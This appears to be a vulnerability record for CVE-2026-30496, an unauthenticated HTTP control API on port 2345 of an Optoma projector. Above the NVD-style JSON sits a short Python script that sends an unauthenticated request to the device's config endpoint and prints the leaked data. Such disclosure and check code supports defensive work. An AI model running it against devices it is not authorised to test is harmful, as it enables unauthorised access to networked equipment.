CVE-2026-30496

import requests def check_exploit(target_ip): # Target port 2345 as described in CVE url = f"http://{target_ip}:2345/api/config" try: # Send unauthenticated request response = requests.get(url, timeout=5) if response.status_code == 200: print(f"[+] Target is vulnerable. Config data: {response.text[:100]}...") return True except Exception as e: print(f"[-] Connection failed: {e}") return False if __name__ == "__main__": check_exploit("192.168.1.10")

{"cve": {"id": "CVE-2026-30496", "sourceIdentifier": "[email protected]", "published": "2026-05-07T14:16:02.097", "lastModified": "2026-05-08T23:16:34.893", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Optoma CinemaX P2 projector (firmware TVOS-04.24.010.04.01, Android 8.0.0) exposes an HTTP API on TCP port 2345 that allows full unauthenticated remote control of the device. The API supports both reading configuration (74 endpoints) and writing/modifying settings including volume, mute, brightness, power, network protocols enable/disable (including TELNET), display modes, and other projector functions. Any device on the same network can control the projector without authentication."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}]}], "references": [{"url": "https://whitelabel.org/security/2026-02-01-smart-projector/", "source": "[email protected]"}]}}